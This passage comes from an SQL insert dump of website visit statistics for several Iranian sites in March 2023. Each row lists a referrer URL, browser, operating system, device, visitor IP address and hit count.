(29614,'2023-03-05','https://ns2.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.154','000',0,2,0),
(29615,'2023-03-05','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.31','000',0,2,0),
(29616,'2023-03-05','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.110.15','000',0,1,0),
(29617,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.214.126.216','000',0,2,0),
(29618,'2023-03-05','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,3,0),
(29619,'2023-03-05','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.78','000',0,1,0),
(29620,'2023-03-05','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','27.115.124.70','000',0,1,0),
(29621,'2023-03-05','http://baidu.com/','Chrome','Android','87.0.0.0','mobile:smart','Pixel 2','','42.236.10.75','000',0,1,0),
(29622,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.141.42','000',0,1,0),
(29623,'2023-03-05','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','63.0.0.0','desktop','Unknown','','185.119.81.106','000',0,4,0),
(29624,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','79.0.0.0','desktop','Unknown','','103.149.192.154','000',0,1,0),
(29625,'2023-03-05','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,4,0),
(29626,'2023-03-05','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','190.145.68.131','000',0,1,0),
(29627,'2023-03-05','http://neginghavami.ir/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.168.21','000',0,3,0),
(29628,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','84.0.0.0','desktop','Unknown','','5.161.157.132','000',0,1,0),
(29629,'2023-03-05','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','13.114.106.30','000',0,2,0),
(29630,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','89.40.72.192','000',0,1,0),
(29631,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','148.72.232.104','000',0,1,0),
(29632,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','198.71.228.36','000',0,1,0),
(29633,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','47.90.51.130','000',0,1,0),
(29634,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','50.62.177.89','000',0,1,0),
(29635,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.106.249.142','000',0,2,0),
(29636,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','64.225.115.204','000',0,1,0),
(29637,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','198.71.240.3','000',0,1,0),
(29638,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','50.62.177.118','000',0,1,0),
(29639,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','92.204.221.78','000',0,1,0),
(29640,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','129.232.187.186','000',0,1,0),
(29641,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','169.255.57.42','000',0,1,0),
(29642,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','167.88.167.241','000',0,1,0),
(29643,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','182.50.151.9','000',0,1,0),
(29644,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','159.89.182.223','000',0,1,0),
(29645,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','208.109.41.234','000',0,1,0),
(29646,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','208.180.150.73','000',0,1,0),
(29647,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','202.43.248.242','000',0,1,0),
(29648,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','186.234.80.94','000',0,1,0),
(29649,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','68.178.196.243','000',0,1,0),
(29650,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','86.111.241.251','000',0,1,0),
(29651,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','103.28.36.224','000',0,1,0),
(29652,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','209.235.237.91','000',0,1,0),
(29653,'2023-03-05','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','208.109.40.126','000',0,1,0),
(29654,'2023-03-06','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,16,0),
(29655,'2023-03-06','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29656,'2023-03-06','https://ictbank.ir/blog','Firefox','Windows','50.0','desktop','Unknown','','100.24.33.137','000',0,2,0),
(29657,'2023-03-06','https://45.92.94.221:443/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.7','000',0,3,0),
(29658,'2023-03-06','https://45.92.94.221/blog','Firefox','Windows','79.0','desktop','Unknown','','164.52.36.213','000',0,2,0),
(29659,'2023-03-06','https://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.122','000',0,2,0),
(29660,'2023-03-06','https://ictbank.ir/blog','Chrome','Android','81.0.0.0','mobile:smart','Nexus 5','','121.5.231.252','000',0,2,0),
(29661,'2023-03-06','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','23.88.121.72','000',0,24,0),
(29662,'2023-03-06','http://45.92.94.221:80/','Vivo Browser','Android','8.0.0.0','mobile:smart','Unknown','','152.32.169.243','000',0,3,0),
(29663,'2023-03-06','https://45.92.94.221:443/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,20,0),
(29664,'2023-03-06','https://ictbank.ir/blog','Safari','OS X','5.0','desktop','Macintosh','','208.80.194.126','000',0,2,0),
(29665,'2023-03-06','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','163.172.56.94','000',0,2,0),
(29666,'2023-03-06','https://ictbank.ir/hooman/admin/','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.237.150.95','000',0,64,0),
(29667,'2023-03-06','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.26','000',0,1,0),
(29668,'2023-03-06','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.170','000',0,2,0),
(29669,'2023-03-06','https://ictbank.ir/blog','Chrome','Windows','41.0.0.0','desktop','Unknown','','89.248.165.204','000',0,3,0),
(29670,'2023-03-06','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','110.0.0.0','desktop','Unknown','','188.226.188.142','000',0,4,0),
(29671,'2023-03-06','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','20.7.133.62','000',0,1,0),
(29672,'2023-03-06','https://ictbank.ir/blog','Yandex Browser','OS X','22.0.0','desktop','Macintosh','','185.244.182.41','000',0,4,0),
(29673,'2023-03-06','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','200.4.142.32','000',0,1,0),
(29674,'2023-03-06','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.121','000',0,3,0),
(29675,'2023-03-06','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','20.244.40.149','000',0,1,0),
(29676,'2023-03-06','https://ictbank.ir/blog','Chrome','Windows','91.0.0.0','desktop','Unknown','','91.244.13.58','000',0,2,0),
(29677,'2023-03-06','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','54.212.240.228','000',0,1,0),
(29678,'2023-03-06','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.33','000',0,2,0),
(29679,'2023-03-06','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.111','000',0,1,0),
(29680,'2023-03-06','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','202.77.48.139','000',0,1,0),
(29681,'2023-03-06','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.24','000',0,7,0),
(29682,'2023-03-06','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.38','000',0,6,0),
(29683,'2023-03-06','https://ictbank.ir/blog','360 Safe Explorer','Windows','Unknown','desktop','Unknown','','183.136.225.32','000',0,5,0),
(29684,'2023-03-06','https://ictbank.ir/hooman/admin/index.php?pid=students','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.237.142.117','000',0,37,0),
(29685,'2023-03-06','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','34.214.104.176','000',0,2,0),
(29686,'2023-03-06','https://www.google.com/','Chrome','Linux','110.0.0.0','desktop','Unknown','','45.67.41.238','000',0,1,0),
(29687,'2023-03-06','https://ictbank.ir/blog/','Edge','Windows','90.0.0.0','desktop','Unknown','','45.128.199.24','000',0,1,0),
(29688,'2023-03-06','https://ictbank.ir/blog/','Edge','Windows','90.0.0.0','desktop','Unknown','','45.128.199.21','000',0,1,0),
(29689,'2023-03-06','https://ictbank.ir/blog/about-me/','Edge','Windows','90.0.0.0','desktop','Unknown','','45.128.199.4','000',0,1,0),
(29690,'2023-03-06','https://ictbank.ir/blog/categories','Edge','Windows','90.0.0.0','desktop','Unknown','','45.128.199.10','000',0,1,0),
(29691,'2023-03-06','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.31','000',0,1,0),
(29692,'2023-03-06','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.90','000',0,1,0),
(29693,'2023-03-06','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.80','000',0,1,0),
(29694,'2023-03-06','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.79','000',0,1,0),
(29695,'2023-03-06','https://ictbank.ir/blog','Safari','iOS','15.0','mobile:smart','iPhone','','130.255.166.98','000',0,1,0),
(29696,'2023-03-06','https://ictbank.ir/blog','Unknown','Linux','Unknown','','Unknown','','158.69.23.79','000',0,3,0),
(29697,'2023-03-06','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.1.248.42','000',0,2,0),
(29698,'2023-03-06','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.141.34','000',0,1,0),
(29699,'2023-03-06','https://ictbank.ir/blog','Chrome','Android','109.0.0.0','mobile:smart','Galaxy Note 8','','91.107.181.181','000',0,13,0),
(29700,'2023-03-06','http://www.facebook.net/','Firefox','Windows','72.0','desktop','Unknown','','147.78.47.230','000',0,1,0),
(29701,'2023-03-07','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,18,0),
(29702,'2023-03-07','https://ictbank.ir/blog','Firefox','Windows','4.0.0','desktop','Unknown','','208.80.194.121','000',0,2,0),
(29703,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,1,0),
(29704,'2023-03-07','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29705,'2023-03-07','https://ictbank.ir/blog','Unknown','iOS','Unknown','mobile:smart','iPhone','','45.220.2.116','000',0,1,0),
(29706,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.84','000',0,2,0),
(29707,'2023-03-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.134.134','000',0,2,0),
(29708,'2023-03-07','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','188.165.157.120','000',0,2,0),
(29709,'2023-03-07','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.36','000',0,6,0),
(29710,'2023-03-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.180.143.8','000',0,3,0),
(29711,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','88.0.0.0','desktop','Unknown','','94.102.61.10','000',0,1,0),
(29712,'2023-03-07','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,3,0),
(29713,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','38.0.0.0','desktop','Unknown','','46.161.14.104','000',0,6,0),
(29714,'2023-03-07','http://binance.com','Chrome','Windows','90.0.0.0','desktop','Unknown','','43.153.13.78','000',0,1,0),
(29715,'2023-03-07','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.52','000',0,1,0),
(29716,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','104.168.204.165','000',0,1,0),
(29717,'2023-03-07','https://ictbank.ir/hooman/admin/','Chrome','Windows','110.0.0.0','desktop','Unknown','','31.7.105.43','000',0,33,0),
(29718,'2023-03-07','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.34','000',0,3,0),
(29719,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','16.0.0.0','desktop','Unknown','','208.80.194.126','000',0,4,0),
(29720,'2023-03-07','https://ictbank.ir/blog','Safari','iOS','13.0.0','mobile:smart','iPhone','','223.247.179.42','000',0,1,0),
(29721,'2023-03-07','https://www.google.com/','Chrome','Windows','110.0.0.0','desktop','Unknown','','5.127.19.185','000',0,12,0),
(29722,'2023-03-07','http://www.facebook.net/','Firefox','Windows','72.0','desktop','Unknown','','147.78.47.230','000',0,1,0),
(29723,'2023-03-07','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.25','000',0,1,0),
(29724,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','185.180.143.13','000',0,1,0),
(29725,'2023-03-07','https://ictbank.ir/blog','Firefox','Ubuntu','58.0','desktop','Unknown','','188.165.87.107','000',0,1,0),
(29726,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','93.188.2.5','000',0,1,0),
(29727,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','62.210.185.4','000',0,1,0),
(29728,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','44.206.122.52','000',0,1,0),
(29729,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','103.113.24.254','000',0,1,0),
(29730,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','178.32.183.35','000',0,1,0),
(29731,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','134.119.0.184','000',0,1,0),
(29732,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','23.102.57.130','000',0,1,0),
(29733,'2023-03-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.54','000',0,2,0),
(29734,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','123.57.87.62','000',0,1,0),
(29735,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','64.37.52.52','000',0,1,0),
(29736,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','139.59.76.118','000',0,1,0),
(29737,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','50.62.177.138','000',0,1,0),
(29738,'2023-03-07','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','185.27.99.123','000',0,1,0),
(29739,'2023-03-07','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','185.27.99.146','000',0,1,0),
(29740,'2023-03-07','https://ictbank.ir/blog','Edge','Windows','103.0.0.0','desktop','Unknown','','185.27.99.124','000',0,2,0),
(29741,'2023-03-07','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.109','000',0,2,0),
(29742,'2023-03-07','https://ictbank.ir/blog','Chrome','Linux','98.0.0.0','desktop','Unknown','','80.82.77.33','000',0,2,0),
(29743,'2023-03-07','https://45.92.94.221:443/blog','Chrome','Windows','110.0.0.0','desktop','Unknown','','3.81.25.249','000',0,6,0),
(29744,'2023-03-07','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','182.50.132.106','000',0,1,0),
(29745,'2023-03-07','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','45.142.213.20','000',0,3,0),
(29746,'2023-03-07','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','54.38.144.149','000',0,3,0),
(29747,'2023-03-07','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','121.196.169.184','000',0,1,0),
(29748,'2023-03-07','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.89.195.210','000',0,1,0),
(29749,'2023-03-07','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.94.28','000',0,1,0),
(29750,'2023-03-07','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.87.97','000',0,1,0),
(29751,'2023-03-07','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.88.93.234','000',0,1,0),
(29752,'2023-03-07','https://45.92.94.221/blog','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.254.76.138','000',0,1,0),
(29753,'2023-03-07','https://45.92.94.221/blog/','Chrome','Android','103.0.0.0','mobile:smart','Unknown','','47.251.15.21','000',0,1,0),
(29754,'2023-03-07','https://ictbank.ir/blog','Firefox','OS X','3.0.0','desktop','Macintosh','','208.80.194.122','000',0,1,0),
(29755,'2023-03-07','https://ictbank.ir/blog','Firefox','Linux','73.0','desktop','Unknown','','134.209.174.86','000',0,1,0),
(29756,'2023-03-07','https://ictbank.ir/blog','Chrome','Android','37.0.0.0','mobile:smart','Galaxy Nexus','','52.206.84.190','000',0,1,0),
(29757,'2023-03-07','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.33.65','000',0,2,0),
(29758,'2023-03-07','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.25','000',0,3,0),
(29759,'2023-03-07','https://www.neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.36.112','000',0,3,0),
(29760,'2023-03-07','https://ns11.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.41.193','000',0,5,0),
(29761,'2023-03-07','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.34.187','000',0,1,0),
(29762,'2023-03-07','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.116.89','000',0,1,0),
(29763,'2023-03-07','https://neginghavami.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.122.184','000',0,2,0),
(29764,'2023-03-07','https://ictbank.ir/blog','Chrome','OS X','87.0.0.0','desktop','Macintosh','','209.141.36.231','000',0,1,0),
(29765,'2023-03-07','https://ictbank.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.51.222','000',0,1,0),
(29766,'2023-03-07','https://ns10.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.49.169','000',0,2,0),
(29767,'2023-03-07','https://mail.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','205.185.121.69','000',0,1,0),
(29768,'2023-03-07','https://www.design-arena.ir/blog','Chrome','OS X','96.0.0.0','desktop','Macintosh','','209.141.55.120','000',0,2,0),
(29769,'2023-03-07','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','202.21.38.89','000',0,2,0),
(29770,'2023-03-07','https://ictbank.ir/blog','Chrome','Windows','103.0.0.0','desktop','Unknown','','43.130.154.223','000',0,1,0),
(29771,'2023-03-08','https://ictbank.ir/blog','Chrome','OS X','109.0.0.0','desktop','Macintosh','','185.196.220.26','000',0,1,0),
(29772,'2023-03-08','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','5.161.92.121','000',0,17,0),
(29774,'2023-03-08','https://ictbank.ir/blog','Firefox','Ubuntu','3.0.0','desktop','Unknown','','208.80.194.121','000',0,4,0),
(29775,'2023-03-08','https://www.design-arena.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.1.248.34','000',0,2,0),
(29776,'2023-03-08','https://ictbank.ir/blog','Chrome','Linux','30.0.0.0','desktop','Unknown','','141.94.194.132','000',0,14,0),
(29777,'2023-03-08','https://45.92.94.221:443/blog','Firefox','OS X','32.0','desktop','Macintosh','','148.153.45.234','000',0,8,0),
(29778,'2023-03-08','https://ictbank.ir/blog','Internet Explorer','Windows','8.0','desktop','Unknown','','208.80.194.126','000',0,3,0),
(29779,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','92.0.0.0','desktop','Unknown','','188.166.94.189','000',0,1,0),
(29780,'2023-03-08','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','13.114.106.30','000',0,1,0),
(29781,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','78.0.0.0','desktop','Unknown','','152.89.196.211','000',0,7,0),
(29782,'2023-03-08','https://ictbank.ir/blog','Internet Explorer','Windows','6.0','desktop','Unknown','','14.161.51.22','000',0,1,0),
(29783,'2023-03-08','https://www.google.com/','Chrome','Windows','110.0.0.0','desktop','Unknown','','70.66.225.47','000',0,1,0),
(29784,'2023-03-08','http://ictbank.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','128.199.179.16','000',0,1,0),
(29785,'2023-03-08','https://ictbank.ir/blog','Firefox','OS X','77.0','desktop','Macintosh','','92.118.39.108','000',0,2,0),
(29786,'2023-03-08','http://ictbank.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','81.93.142.130','000',0,1,0),
(29787,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.118.53.210','000',0,1,0),
(29788,'2023-03-08','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.58','000',0,5,0),
(29789,'2023-03-08','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.59','000',0,3,0),
(29790,'2023-03-08','https://ictbank.ir/blog','Opera','Windows','32.0.0.0','desktop','Unknown','','45.95.11.26','000',0,3,0),
(29791,'2023-03-08','https://ictbank.ir/blog/','Edge','Windows','90.0.0.0','desktop','Unknown','','136.169.243.74','000',0,1,0),
(29792,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.154','000',0,1,0),
(29793,'2023-03-08','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','162.221.192.26','000',0,2,0),
(29794,'2023-03-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','198.71.231.66','000',0,1,0),
(29795,'2023-03-08','https://ictbank.ir/blog','Firefox','Windows','66.0','desktop','Unknown','','152.89.196.13','000',0,1,0),
(29796,'2023-03-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.46','000',0,2,0),
(29797,'2023-03-08','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.45','000',0,3,0),
(29798,'2023-03-08','https://www.bing.com/','Edge','Linux','110.0.0.0','desktop','Unknown','','94.228.56.26','000',0,1,0),
(29799,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.234','000',0,1,0),
(29800,'2023-03-08','https://ictbank.ir/blog','Chrome','OS X','110.0.0.0','desktop','Macintosh','','110.141.33.65','000',0,2,0),
(29801,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','105.0.0.0','desktop','Unknown','','88.99.136.18','000',0,1,0),
(29802,'2023-03-08','https://ictbank.ir/blog','Chrome','Linux','61.0.0.0','desktop','Unknown','','64.124.8.46','000',0,4,0),
(29803,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.141.42','000',0,1,0),
(29804,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','52.0.0.0','desktop','Unknown','','35.173.189.100','000',0,2,0),
(29805,'2023-03-08','https://45.92.94.221/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','128.14.209.162','000',0,2,0),
(29806,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','66.0.0.0','desktop','Unknown','','128.14.209.46','000',0,1,0),
(29807,'2023-03-08','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','104.192.3.74','000',0,1,0),
(29808,'2023-03-08','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.100.251','000',0,1,0),
(29809,'2023-03-08','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','185.220.100.252','000',0,1,0),
(29810,'2023-03-08','https://www.google.com','Chrome','Windows','97.0.0.0','desktop','Unknown','','82.221.131.5','000',0,4,0),
(29811,'2023-03-08','https://ictbank.ir/blog','Unknown','Unknown','Unknown','','Unknown','','194.26.192.189','000',0,21,0),
(29812,'2023-03-08','https://l.instagram.com/','Instagram','iOS','273.0.0.0.0','mobile:smart','iPhone 8','','146.59.111.154','000',0,1,0),
(29813,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','217.67.22.56','000',0,1,0),
(29814,'2023-03-08','https://ictbank.ir/blog','Internet Explorer','Windows','9.0','desktop','Unknown','','103.177.224.44','000',0,2,0),
(29815,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','93.90.147.101','000',0,1,0),
(29816,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','198.38.82.252','000',0,1,0),
(29817,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','93.113.110.128','000',0,1,0),
(29818,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','46.235.40.78','000',0,1,0),
(29819,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','197.242.67.112','000',0,1,0),
(29820,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','103.123.243.22','000',0,1,0),
(29821,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','50.28.49.131','000',0,1,0),
(29822,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','47.118.36.184','000',0,1,0),
(29823,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.6.40.32','000',0,1,0),
(29824,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','208.92.193.36','000',0,1,0),
(29825,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','51.68.11.227','000',0,1,0),
(29826,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','193.202.110.30','000',0,1,0),
(29827,'2023-03-08','https://ictbank.ir/blog','Chrome','Windows','60.0.0.0','desktop','Unknown','','185.66.249.152','000',0,1,0),
(29828,'2023-03-08','https://ictbank.ir/blog','Firefox','Windows','7.0.0','desktop','Unknown','','208.80.194.122','000',0,3,0),
(29829,'2023-03-08','https://ictbank.ir/blog','Firefox','Windows','.0','desktop','Unknown','','103.173.78.7','000',0,1,0),
(29830,'2023-03-08','http://design-arena.ir','Chrome','Windows','50.0.0.0','desktop','Unknown','','213.152.250.204','000',0,1,0),
(29831,'2023-03-08','http://design-arena.ir','Chrome','Windows','58.0.0.0','desktop','Unknown','','163.172.56.94','000',0,1,0),
